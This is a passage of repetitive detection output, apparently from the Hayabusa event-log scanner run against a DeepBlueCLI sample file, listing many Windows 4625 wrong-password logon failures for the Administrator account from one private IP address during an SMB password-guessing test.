40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : 